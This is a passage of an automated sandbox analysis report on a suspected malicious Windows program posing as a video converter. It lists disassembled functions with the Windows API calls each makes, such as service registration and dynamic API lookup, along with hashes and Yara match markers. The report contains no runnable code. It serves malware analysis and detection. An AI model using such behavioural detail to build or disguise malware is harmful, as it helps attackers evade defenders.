                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: e0eacae0242e1e5faf590052052bcae401a8f098aee6db5c0530e5f02416657f
                                                                                • Instruction ID: 985ca834110de4d28dac166a223b26c0e480c538823d3516225f17fd21feffa8
                                                                                • Opcode Fuzzy Hash: e0eacae0242e1e5faf590052052bcae401a8f098aee6db5c0530e5f02416657f
                                                                                • Instruction Fuzzy Hash: 9FB092324C4208EBEB012B91EC0AF8DBF38EB04662F104810F60D44290CB6258219AA9
                                                                                Function 02D8F78E Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memset
                                                                                • String ID:
                                                                                • API String ID: 2102423945-0
                                                                                • Opcode ID: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                                                • Instruction ID: 657f092afca9481382604478adc5f47782a857c4c0984fb99d1cdd9cb500310f
                                                                                • Opcode Fuzzy Hash: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                                                • Instruction Fuzzy Hash: 49F082B1904309AED700DF95D942B9DFBB8EB84314F208169E508A7340E6707E118B94
                                                                                Function 004027A0 Relevance: 1.5, APIs: 1, Instructions: 7serviceCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: CreateService
                                                                                • String ID:
                                                                                • API String ID: 1592570254-0
                                                                                • Opcode ID: 1d38772bc1ace6aa1b07cd755cd4630d2b7614a248986e062ee3cea099dcb878
                                                                                • Instruction ID: f7d3c8d18ae334c858f8c4169a54dec7e29353bdc6d6116ea5f4fa24518e5ba3
                                                                                • Opcode Fuzzy Hash: 1d38772bc1ace6aa1b07cd755cd4630d2b7614a248986e062ee3cea099dcb878
                                                                                • Instruction Fuzzy Hash: 43B01250288101F9C1000A101C548251038D1417443B004769003F00D0D33C02867DFF
                                                                                Function 004027BE Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • StartServiceCtrlDispatcherA.ADVAPI32 ref: 004027BE
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: CtrlDispatcherServiceStart
                                                                                • String ID:
                                                                                • API String ID: 3789849863-0
                                                                                • Opcode ID: 6492b282c70fd13d5cbb1222aad192a51b611fb48b1ee967596fe98ef600a279
                                                                                • Instruction ID: 241407c2588b1c3ee9bf3d258d8a139c16ddca8ca6f6fd059ddab97a4f2a1dda
                                                                                • Opcode Fuzzy Hash: 6492b282c70fd13d5cbb1222aad192a51b611fb48b1ee967596fe98ef600a279
                                                                                • Instruction Fuzzy Hash: E690027004D200C6D94446109E0C4786518E24F7167215033D00F728D5877C0456655F
                                                                                Function 02D824E1 Relevance: 21.2, APIs: 14, Instructions: 173COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D824E6
                                                                                • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02D824FC
                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 02D8250E
                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 02D8256D
                                                                                • SetLastError.KERNEL32(00000000,?,7622DFB0), ref: 02D8257F
                                                                                • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,7622DFB0), ref: 02D82599
                                                                                • GetLastError.KERNEL32(?,7622DFB0), ref: 02D825A2
                                                                                • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D825F0
                                                                                • InterlockedDecrement.KERNEL32(00000002), ref: 02D8262F
                                                                                • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02D8268E
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D82699
                                                                                • InterlockedExchange.KERNEL32(00000000,00000001), ref: 02D826AD
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,7622DFB0), ref: 02D826BD
                                                                                • GetLastError.KERNEL32(?,7622DFB0), ref: 02D826C7
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                                • String ID:
                                                                                • API String ID: 1213838671-0
                                                                                • Opcode ID: 86294c8532acd4bf0dd22971c53e503f497eab6ab0795c96b0d2fd9450b9eccc
                                                                                • Instruction ID: 60c26f6c280ef32b36cba4c52a2af151e5087ff04c2cad5435a774b0b8cbb783
                                                                                • Opcode Fuzzy Hash: 86294c8532acd4bf0dd22971c53e503f497eab6ab0795c96b0d2fd9450b9eccc
                                                                                • Instruction Fuzzy Hash: C5610971900249AFDB10EFA4D989EAEBBB9FF08314F10496AE956E3340D734AD54CF64
                                                                                Function 004023AC Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 80registrysynchronizationthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegisterServiceCtrlHandlerA.ADVAPI32(ET Ammeter Side 10.7.45,0040235E), ref: 004023C1
                                                                                • SetServiceStatus.ADVAPI32(0040A0E0), ref: 00402420
                                                                                • GetLastError.KERNEL32 ref: 00402422
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                                                • GetLastError.KERNEL32 ref: 00402450
                                                                                • SetServiceStatus.ADVAPI32(0040A0E0), ref: 00402480
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                                                • CloseHandle.KERNEL32 ref: 004024A1
                                                                                • SetServiceStatus.ADVAPI32(0040A0E0), ref: 004024CA
                                                                                Strings
                                                                                • ET Ammeter Side 10.7.45, xrefs: 004023BC
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                                • String ID: ET Ammeter Side 10.7.45
                                                                                • API String ID: 3346042915-2295085586
                                                                                • Opcode ID: 0bac2955eb8625cf60f76f4bbfe82ce878a41a6c6cb59ed4d7ea205cd266c3a3
                                                                                • Instruction ID: e607d343a15970cd44bf33002b1e5153504bc9bcaf452d951a8c8a09ef4d4640
                                                                                • Opcode Fuzzy Hash: 0bac2955eb8625cf60f76f4bbfe82ce878a41a6c6cb59ed4d7ea205cd266c3a3
                                                                                • Instruction Fuzzy Hash: 56211970441309EBD210DF16EF49E567FB8EB85754710C03BE206B22B1D7BA0465EB2E
                                                                                Function 02D98272 Relevance: 18.1, APIs: 12, Instructions: 84COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlDecodePointer.NTDLL(?), ref: 02D9827A
                                                                                • _free.LIBCMT ref: 02D98293
                                                                                  • Part of subcall function 02D92EB4: HeapFree.KERNEL32(00000000,00000000,?,02D95C12,00000000,00000104,76230A60), ref: 02D92EC8
                                                                                  • Part of subcall function 02D92EB4: GetLastError.KERNEL32(00000000,?,02D95C12,00000000,00000104,76230A60), ref: 02D92EDA
                                                                                • _free.LIBCMT ref: 02D982A6
                                                                                • _free.LIBCMT ref: 02D982C4
                                                                                • _free.LIBCMT ref: 02D982D6
                                                                                • _free.LIBCMT ref: 02D982E7
                                                                                • _free.LIBCMT ref: 02D982F2
                                                                                • _free.LIBCMT ref: 02D98316
                                                                                • RtlEncodePointer.NTDLL(007BDFB8), ref: 02D9831D
                                                                                • _free.LIBCMT ref: 02D98332
                                                                                • _free.LIBCMT ref: 02D98348
                                                                                • _free.LIBCMT ref: 02D98370
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 3064303923-0
                                                                                • Opcode ID: 5d705446e13bf2c9167e55d1bf84174f7d99005faa7a2cdd0d1971c815d74685
                                                                                • Instruction ID: 45d02a2b41f44aa758d8374de8bb3a1a81e34e43f942848f21bc79326fdb088b
                                                                                • Opcode Fuzzy Hash: 5d705446e13bf2c9167e55d1bf84174f7d99005faa7a2cdd0d1971c815d74685
                                                                                • Instruction Fuzzy Hash: 9D215C32D41210EBDF266F26E8A451B77ADEB06B60729482AFC44D7350C735DC65EFA0
                                                                                Function 0040359E Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 132COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 004035B9
                                                                                • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 004035CD
                                                                                • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 004035F9
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402DE4), ref: 00403631
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402DE4), ref: 00403653
                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402DE4), ref: 0040366C
                                                                                • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 0040367F
                                                                                • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004036BD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                • String ID: -@
                                                                                • API String ID: 1823725401-2999422947
                                                                                • Opcode ID: d09c44be7b725e9416f1bbabc7ff939c5033ef1a694eb4ed66286c613d9d8241
                                                                                • Instruction ID: a052efc5f8264b04540ba139265ff63877c4dc4e75c0ae38b6650f7b3518fcca
                                                                                • Opcode Fuzzy Hash: d09c44be7b725e9416f1bbabc7ff939c5033ef1a694eb4ed66286c613d9d8241
                                                                                • Instruction Fuzzy Hash: 7A31F0B24042217EDB303F785C8883B7E9CE64574A7120D3BF542E3390E67A8E814AAD
                                                                                Function 02D83423 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 94libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D83428
                                                                                • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02D8346B
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02D83472
                                                                                • GetLastError.KERNEL32 ref: 02D83486
                                                                                • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02D834D7
                                                                                • RtlEnterCriticalSection.NTDLL(00000018), ref: 02D834ED
                                                                                • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02D83518
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                                • String ID: CancelIoEx$KERNEL32
                                                                                • API String ID: 2902213904-434325024
                                                                                • Opcode ID: 7060e57ff1103dece5f5fb7f44a0a98ed7cfc21b8671b5ffe6236ba4f5c6aa04
                                                                                • Instruction ID: e0e069a832a464486acc351ed8e4c8204967fabae56012f7e1f6566395f44ab2
                                                                                • Opcode Fuzzy Hash: 7060e57ff1103dece5f5fb7f44a0a98ed7cfc21b8671b5ffe6236ba4f5c6aa04
                                                                                • Instruction Fuzzy Hash: 19317C71904205DFEB01AFA8D844AAEBBF9FF49711F1084AAE8199B340D774DD11CBA1
                                                                                Function 00405408 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 50libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00403D7D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406528,?,00406578,?,?,?,Runtime Error!Program: ), ref: 0040541A
                                                                                • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00405432
                                                                                • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00405443
                                                                                • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00405450
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll$xe@
                                                                                • API String ID: 2238633743-4073082454
                                                                                • Opcode ID: c1c5459b902c6d691e26e6f6b3d5bc075fbf46770f4929c54e66e674ea662e67
                                                                                • Instruction ID: 002c49bf34bfddc632f277928187d9a53126bd14f393e8a72b926efab3457658
                                                                                • Opcode Fuzzy Hash: c1c5459b902c6d691e26e6f6b3d5bc075fbf46770f4929c54e66e674ea662e67
                                                                                • Instruction Fuzzy Hash: E1018431740705AFC7109FB4AD80E6B7AE9FB48791309843BB955F22A1D778C860CF69
                                                                                Function 00403C59 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00403CC6
                                                                                • GetStdHandle.KERNEL32(000000F4,00406528,00000000,?,00000000,00000000), ref: 00403D9C
                                                                                • WriteFile.KERNEL32(00000000), ref: 00403DA3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: File$HandleModuleNameWrite
                                                                                • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $r@
                                                                                • API String ID: 3784150691-1191147370
                                                                                • Opcode ID: d598713df4d839de7fd74915155ccdeaa4efa499b3dc35e679589c6eb5dc5418
                                                                                • Instruction ID: 901e413bd7d296cb1b0b97d790854a8d5494ec17f79a926850544caa0371b074
                                                                                • Opcode Fuzzy Hash: d598713df4d839de7fd74915155ccdeaa4efa499b3dc35e679589c6eb5dc5418
                                                                                • Instruction Fuzzy Hash: F831C772A04208AEEF20EF60DE49F9A776CEF45304F1004BBF545F61C1D6B8AA858A59
                                                                                Function 004058D5 Relevance: 13.7, APIs: 9, Instructions: 177COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LCMapStringW.KERNEL32(00000000,00000100,004065F4,00000001,00000000,00000000,00000103,00000001,00000000,?,004051A5,00200020,00000000,?,00000000,00000000), ref: 00405917
                                                                                • LCMapStringA.KERNEL32(00000000,00000100,004065F0,00000001,00000000,00000000,?,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405933
                                                                                • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,004051A5,?,00000103,00000001,00000000,?,004051A5,00200020,00000000,?,00000000,00000000), ref: 0040597C
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,004051A5,00200020,00000000,?,00000000,00000000), ref: 004059B4
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,004051A5,00200020,00000000,?,00000000), ref: 00405A0C
                                                                                • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,004051A5,00200020,00000000,?,00000000), ref: 00405A22
                                                                                • LCMapStringW.KERNEL32(00000000,?,004051A5,00000000,004051A5,?,?,004051A5,00200020,00000000,?,00000000), ref: 00405A55
                                                                                • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,004051A5,00200020,00000000,?,00000000), ref: 00405ABD
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: String$ByteCharMultiWide
                                                                                • String ID:
                                                                                • API String ID: 352835431-0
                                                                                • Opcode ID: 6e7e0904aad4ffb7df7fa70090622cd283316a6a4d1fe7c3c07164d91eefa06b
                                                                                • Instruction ID: ad677ee5f46337090c489763c5b1535e0d4a7e7cc2f37d679e5ddd81b555dfe6
                                                                                • Opcode Fuzzy Hash: 6e7e0904aad4ffb7df7fa70090622cd283316a6a4d1fe7c3c07164d91eefa06b
                                                                                • Instruction Fuzzy Hash: 8B516C71A00609EFCF218FA5DD85A9F7FB5FB48750F14422AF911B21A0D3398921DF69
                                                                                Function 02D91550 Relevance: 10.6, APIs: 7, Instructions: 132COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenEventA.KERNEL32(00100002,00000000,00000000,9D194A3F), ref: 02D915F0
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D91605
                                                                                • ResetEvent.KERNEL32(00000000,9D194A3F), ref: 02D9160F
                                                                                • CloseHandle.KERNEL32(00000000,9D194A3F), ref: 02D91644
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,9D194A3F), ref: 02D916BA
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D916CF
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEventHandle$CreateOpenReset
                                                                                • String ID:
                                                                                • API String ID: 1285874450-0
                                                                                • Opcode ID: fd59793e34878e10ddbfd3a22be253b3904bce2d918f9716a2f7ff78a676ccac
                                                                                • Instruction ID: 365985178c0209125dca3202165a5a1fedad8156584aa750a2a6d17597a76a5a
                                                                                • Opcode Fuzzy Hash: fd59793e34878e10ddbfd3a22be253b3904bce2d918f9716a2f7ff78a676ccac
                                                                                • Instruction Fuzzy Hash: 8F412975D0435AABDF21CFA5C848BAEBBB8EB05724F144619F819AB380D770DD05CBA0
                                                                                Function 02D82081 Relevance: 10.6, APIs: 7, Instructions: 116timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D820AC
                                                                                • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02D820CD
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D820D8
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 02D8213E
                                                                                • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02D8217A
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 02D82187
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D821A6
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                                                • String ID:
                                                                                • API String ID: 1171374749-0
                                                                                • Opcode ID: adc6b4cb4e3e6989ebd444a012c5fa2da865c35eb780fd680ebcd3cf5547b92c
                                                                                • Instruction ID: e65802c12a27b126a227de01b3ddf5829490c505c5d8ccd7f75f84fc6e9f1387
                                                                                • Opcode Fuzzy Hash: adc6b4cb4e3e6989ebd444a012c5fa2da865c35eb780fd680ebcd3cf5547b92c
                                                                                • Instruction Fuzzy Hash: 36413B755047459FD311EF25D889A6BBBF9EBC8754F100A1EF89A82250D730E909CFA1
                                                                                Function 02D91662 Relevance: 10.6, APIs: 7, Instructions: 107synchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 02D91E10: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02D9166E,?,?), ref: 02D91E3F
                                                                                  • Part of subcall function 02D91E10: CloseHandle.KERNEL32(00000000,?,?,02D9166E,?,?), ref: 02D91E54
                                                                                  • Part of subcall function 02D91E10: SetEvent.KERNEL32(00000000,02D9166E,?,?), ref: 02D91E67
                                                                                • OpenEventA.KERNEL32(00100002,00000000,00000000,9D194A3F), ref: 02D915F0
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D91605
                                                                                • ResetEvent.KERNEL32(00000000,9D194A3F), ref: 02D9160F
                                                                                • CloseHandle.KERNEL32(00000000,9D194A3F), ref: 02D91644
                                                                                • __CxxThrowException@8.LIBCMT ref: 02D91675
                                                                                  • Part of subcall function 02D9449A: RaiseException.KERNEL32(?,?,02D8FA92,?,?,?,?,?,?,?,02D8FA92,?,02DB0F78,?), ref: 02D944EF
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,9D194A3F), ref: 02D916BA
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D916CF
                                                                                  • Part of subcall function 02D91B50: GetCurrentProcessId.KERNEL32(?), ref: 02D91BA9
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,9D194A3F), ref: 02D916DF
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                                                • String ID:
                                                                                • API String ID: 2227236058-0
                                                                                • Opcode ID: d2a258f47c21c9e027d5a615a9ce98ddc396fcd268283bca7efb3195e988114e
                                                                                • Instruction ID: cc52c84e5709d8f6797c8c2bc4a728081bdcf1dcc4078833c272557da210864a
                                                                                • Opcode Fuzzy Hash: d2a258f47c21c9e027d5a615a9ce98ddc396fcd268283bca7efb3195e988114e
                                                                                • Instruction Fuzzy Hash: 9D313875E0035AABDF20CBA59C44BADB7B9AF05715F180219F81DAB380E770DD05CB61
                                                                                Function 00404618 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 102memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00403A36), ref: 00404639
                                                                                • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00403A36), ref: 0040465D
                                                                                • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00403A36), ref: 00404677
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00403A36), ref: 00404738
                                                                                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00403A36), ref: 0040474F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual$FreeHeap
                                                                                • String ID: r@$r@
                                                                                • API String ID: 714016831-1712950306
                                                                                • Opcode ID: 6146d640eca2786615fae02a601f05dd2cfcbd8d5d5bc8993479f9a7be96b628
                                                                                • Instruction ID: 6d2ae56a8b2e66d9b660bb9c1c671dd7469dd609f739855ae4ec176a3c74651c
                                                                                • Opcode Fuzzy Hash: 6146d640eca2786615fae02a601f05dd2cfcbd8d5d5bc8993479f9a7be96b628
                                                                                • Instruction Fuzzy Hash: 3531BEB0940702ABD3309F24DD44B66B7A4EB86755F11463BF265BB2D0E7B8A8418B4D
                                                                                Function 02D95CD4 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __init_pointers.LIBCMT ref: 02D95CD4
                                                                                  • Part of subcall function 02D98442: RtlEncodePointer.NTDLL(00000000), ref: 02D98445
                                                                                  • Part of subcall function 02D98442: __initp_misc_winsig.LIBCMT ref: 02D98460
                                                                                  • Part of subcall function 02D98442: GetModuleHandleW.KERNEL32(kernel32.dll,?,02DB1578,00000008,00000003,02DB0F5C,?,00000001), ref: 02D991C1
                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02D991D5
                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02D991E8
                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02D991FB
                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02D9920E
                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02D99221
                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02D99234
                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02D99247
                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02D9925A
                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02D9926D
                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02D99280
                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02D99293
                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02D992A6
